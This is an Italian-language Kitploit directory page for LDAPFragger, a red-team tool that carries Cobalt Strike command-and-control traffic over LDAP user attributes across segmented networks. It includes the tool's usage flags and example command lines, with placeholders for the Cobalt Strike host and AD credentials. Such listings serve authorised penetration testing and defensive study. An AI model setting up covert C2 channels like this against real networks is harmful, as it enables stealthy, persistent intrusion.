Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
LDAPFragger — Strumento C2 che instrada i dati dei beacon di Cobalt Strike attraverso attributi utente LDAP per un comando e controllo furtivo in reti segmentate. | Kitploit
Strumenti/GitHubGitHub/fox-it/ldapfragger
Frameworks per Penetration TestingFramework di ExploitCommand and ControlRed TeamingSviluppo Payload
GitHubfox-it/ldapfragger

LDAPFragger

Strumento C2 che instrada i dati dei beacon di Cobalt Strike attraverso attributi utente LDAP per un comando e controllo furtivo in reti segmentate.

Vedi Repository
196286 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

LDAPFragger

LDAPFragger è uno strumento Command and Control che consente agli attaccanti di instradare i dati dei beacon di Cobalt Strike su LDAP utilizzando attributi utente.

Per informazioni di base, leggi il blog di rilascio: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes

Dipendenze e installazione

  • Compilato con .NET 4.0, ma potrebbe funzionare anche con framework .NET più vecchi o nuovi

Utilizzo

root@kitploit:~
 _     _              __
| |   | |            / _|
| | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __
| |/ _` |/ _` | '_ \|  _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |
|_|\__,_|\__,_| .__/|_| |_|  \__,_|\__, |\__, |\___|_|
              | |                   __/ | __/ |
              |_|                  |___/ |___/

Fox-IT - Rindert Kramer

Usage:
     --cshost:  IP address or hostname of the Cobalt Strike instance
     --csport:  Port of the external C2 interface on the Cobalt Strike server
     -u:        Username to connect to Active Directory
     -p:        Password to connect to Active Directory
     -d:        FQDN of the Active Directory domain
     --ldaps:   Use LDAPS instead of LDAP
     -v:        Verbose output
     -h:        Display  this message

If no AD credentials are provided, integrated AD authentication will be used.

Esempio di utilizzo:

Dal segmento di rete A, esegui

root@kitploit:~
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>

LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

Dal segmento di rete B, esegui

root@kitploit:~
LDAPFragger 

LDAPFragger -u <username> -p <password> -d <domain FQDN>

LDAPS può essere utilizzato con il flag --LDAPS, tuttavia anche il traffico LDAP normale è crittografato. Si noti che il payload predefinito di Cobalt Strike verrà rilevato dalla maggior parte degli AV.

Scarica lo strumento